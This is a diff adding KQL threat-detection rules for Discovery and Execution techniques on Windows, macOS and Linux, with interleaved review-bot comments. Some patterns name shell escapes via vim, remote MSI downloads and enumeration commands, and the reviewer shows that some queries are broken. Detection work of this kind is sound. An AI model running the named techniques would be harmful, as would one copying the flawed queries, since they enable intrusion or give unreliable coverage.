index 00000000..3e3bd8b8
--- /dev/null
+++ b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
@@ -0,0 +1,15 @@
+// Title: System Information Discovery Using Ioreg
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "ioreg" which will show I/O Kit registry information.
+This process is used for system information discovery.
+It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-l" or ProcessCommandLine contains "-c") and (ProcessCommandLine contains "AppleAHCIDiskDriver" or ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "Oracle" or ProcessCommandLine contains "Parallels" or ProcessCommandLine contains "USB Vendor Name" or ProcessCommandLine contains "VirtualBox" or ProcessCommandLine contains "VMware") and (FolderPath endswith "/ioreg" or ProcessCommandLine contains "ioreg")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql
new file mode 100644
index 00000000..15533619
--- /dev/null
+++ b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery Using sw_vers
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "sw_vers" for system information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/sw_vers" and (ProcessCommandLine contains "-buildVersion" or ProcessCommandLine contains "-productName" or ProcessCommandLine contains "-productVersion")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
new file mode 100644
index 00000000..c317d814
--- /dev/null
+++ b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
@@ -0,0 +1,14 @@
+// Title: System Information Discovery Using System_Profiler
+// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
+This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SPApplicationsDataType" or ProcessCommandLine contains "SPHardwareDataType" or ProcessCommandLine contains "SPNetworkDataType" or ProcessCommandLine contains "SPUSBDataType") and (FolderPath endswith "/system_profiler" or ProcessCommandLine contains "system_profiler")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
new file mode 100644
index 00000000..70672c0e
--- /dev/null
+++ b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery via Registry Queries
+// Author: lazarg
+// Date: 2025-06-12
+// Level: low
+// Description: Detects attempts to query system information directly from the Windows Registry.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
new file mode 100644
index 00000000..6c39bf7b
--- /dev/null
+++ b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
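Review bot: In system_information_discovery_via_registry_queries.kql the term `ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services"` already covers the longer `\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces` entry, so that entry is redundant, and the short Services match means any `reg query ... /v` against a service key qualifies, which does not fit the `// - Unlikely` false-positive line carried over from the source rule. Likewise `ProcessCommandLine contains "gpv"` is a bare three-letter substring and will hit inside unrelated arguments. Tightening the alias to `ProcessCommandLine contains " gpv "` and rewording the false-positive note to name service-key queries by administration and inventory tooling would make the rule's real noise level honest.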
@@ -0,0 +1,11 @@
+// Title: System Integrity Protection (SIP) Disabled
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "disable" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
new file mode 100644
index 00000000..d9be9e23
--- /dev/null
+++ b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
@@ -0,0 +1,13 @@
+// Title: System Integrity Protection (SIP) Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: low
+// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "status" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql
new file mode 100644
index 00000000..1847f896
--- /dev/null
+++ b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: System Network Connections Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat") and (not((FolderPath endswith "/who" and InitiatingProcessCommandLine contains "/usr/bin/landscape-sysinfo")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql
new file mode 100644
index 00000000..fbd98d19
--- /dev/null
+++ b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Network Connections Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql
new file mode 100644
index 00000000..563ac286
--- /dev/null
+++ b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: System Network Connections Discovery Via Net.EXE
+// Author: frack113
+// Date: 2021-12-10
+// Level: low
+// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_discovery_linux.kql b/KQL/rules/Discovery/system_network_discovery_linux.kql
new file mode 100644
index 00000000..0ea2b4b4
--- /dev/null
+++ b/KQL/rules/Discovery/system_network_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: System Network Discovery - Linux
+// Author: Ömer Günal and remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/etc/resolv.conf" or (FolderPath endswith "/firewall-cmd" or FolderPath endswith "/ufw" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/ss" or FolderPath endswith "/ip" or FolderPath endswith "/ifconfig" or FolderPath endswith "/systemd-resolve" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_discovery_macos.kql b/KQL/rules/Discovery/system_network_discovery_macos.kql
new file mode 100644
index 00000000..acb8edf8
--- /dev/null
+++ b/KQL/rules/Discovery/system_network_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Network Discovery - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/arp" or FolderPath endswith "/ifconfig" or FolderPath endswith "/netstat" or FolderPath endswith "/networksetup" or FolderPath endswith "/socketfilterfw") or ((ProcessCommandLine contains "/Library/Preferences/com.apple.alf" and ProcessCommandLine contains "read") and FolderPath =~ "/usr/bin/defaults")) and (not(InitiatingProcessFolderPath endswith "/wifivelocityd"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
new file mode 100644
index 00000000..8c788be5
--- /dev/null
+++ b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Connection to Active Directory Web Services
+// Author: @kostastsale
+// Date: 2024-01-26
+// Level: medium
+// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087
+// False Positives:
+// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives.
+
+DeviceNetworkEvents
+| where RemotePort == 9389 and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\WindowsPowerShell\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
new file mode 100644
index 00000000..3ff984b5
--- /dev/null
+++ b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
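Review bot: `InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\"` compares the full image path for equality against a directory path that ends in a backslash, so it can never be true and the Monitoring Agent exclusion is dead; the neighbouring allow-list entries use `startswith` for values of the same shape. It should read `InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Monitoring Agent\\"`. The `"C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex"` prefix looks like a truncated `pwsh.exe` carried over from the source rule; it still matches under `startswith`, but it is worth normalising so the allow-list reads as intended.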
@@ -0,0 +1,14 @@
+// Title: Uncommon System Information Discovery Via Wmic.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
+and GPU driver products/versions.
+Some of these commands were used by Aurora Stealer in late 2022/early 2023.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql
new file mode 100644
index 00000000..8c26bd44
--- /dev/null
+++ b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql
@@ -0,0 +1,12 @@
+// Title: Use of W32tm as Timer
+// Author: frack113
+// Date: 2022-09-25
+// Level: high
+// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1124
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql
new file mode 100644
index 00000000..839b5d76
--- /dev/null
+++ b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: User Discovery And Export Via Get-ADUser Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
new file mode 100644
index 00000000..b15c895f
--- /dev/null
+++ b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql
@@ -0,0 +1,12 @@
+// Title: Vim GTFOBin Abuse - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: high
+// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
+Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":!/" or ProcessCommandLine contains ":lua " or ProcessCommandLine contains ":py " or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " --cmd" or ProcessCommandLine contains " -c ") and (FolderPath endswith "/rvim" or FolderPath endswith "/vim" or FolderPath endswith "/vimdiff"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/whoami_as_parameter.kql b/KQL/rules/Discovery/whoami_as_parameter.kql
new file mode 100644
index 00000000..5f1484b0
--- /dev/null
+++ b/KQL/rules/Discovery/whoami_as_parameter.kql
@@ -0,0 +1,10 @@
+// Title: WhoAmI as Parameter
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql
new file mode 100644
index 00000000..16cf3b82
--- /dev/null
+++ b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql
@@ -0,0 +1,14 @@
+// Title: Whoami.EXE Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: medium
+// Description: Detects the execution of whoami.exe with suspicious parent processes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+// - Monitoring activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or (InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql
new file mode 100644
index 00000000..e765acfc
--- /dev/null
+++ b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql
@@ -0,0 +1,10 @@
+// Title: Whoami.EXE Execution With Output Option
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
new file mode 100644
index 00000000..dbd6c8f4
--- /dev/null
+++ b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql
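Review bot: The final alternative `ProcessCommandLine =~ "*whoami*>*"` in the Whoami.EXE Execution With Output Option query can never match, because `=~` is case-insensitive string equality in KQL and the `*` characters are compared literally rather than acting as wildcards; the redirection case the description promises is therefore silently dead. A faithful translation is `or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains ">")`. This looks like a wildcard pattern the backend passed through unchanged, so other converted rules may carry the same `=~ "*...*"` shape and are worth searching for before merge.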
@@ -0,0 +1,12 @@
+// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation
+// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact
+// False Positives:
+// - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Find-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Initialize-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Reset-AADInt" or ProcessCommandLine contains "Resolve-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Save-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Unprotect-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or 
FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql
new file mode 100644
index 00000000..b0057dbd
--- /dev/null
+++ b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql
@@ -0,0 +1,10 @@
+// Title: Abusable DLL Potential Sideloading From Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-11
+// Level: high
+// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql
new file mode 100644
index 00000000..256d0222
--- /dev/null
+++ b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Add Windows Capability Via PowerShell Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql
new file mode 100644
index 00000000..cbcf3626
--- /dev/null
+++ b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql
@@ -0,0 +1,10 @@
+// Title: Adwind RAT / JRAT File Artifact
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Roaming\\Oracle\\bin\\java" and FolderPath contains ".exe") or (FolderPath contains "\\Retrive" and FolderPath contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Execution/application_removed_via_wmic_exe.kql b/KQL/rules/Execution/application_removed_via_wmic_exe.kql
new file mode 100644
index 00000000..edd5d8c9
--- /dev/null
+++ b/KQL/rules/Execution/application_removed_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Application Removed Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-28
+// Level: medium
+// Description: Detects the removal or uninstallation of an application via "Wmic.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql
new file mode 100644
index 00000000..4fdd3ae8
--- /dev/null
+++ b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Application Terminated Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects calls to the "terminate" function via wmic in order to kill an application
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql
new file mode 100644
index 00000000..da6e5306
--- /dev/null
+++ b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary Binary Execution Using GUP Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Other parent binaries using GUP not currently identified
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql
new file mode 100644
index 00000000..dbd9319e
--- /dev/null
+++ b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary MSI Download Via Devinit.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql
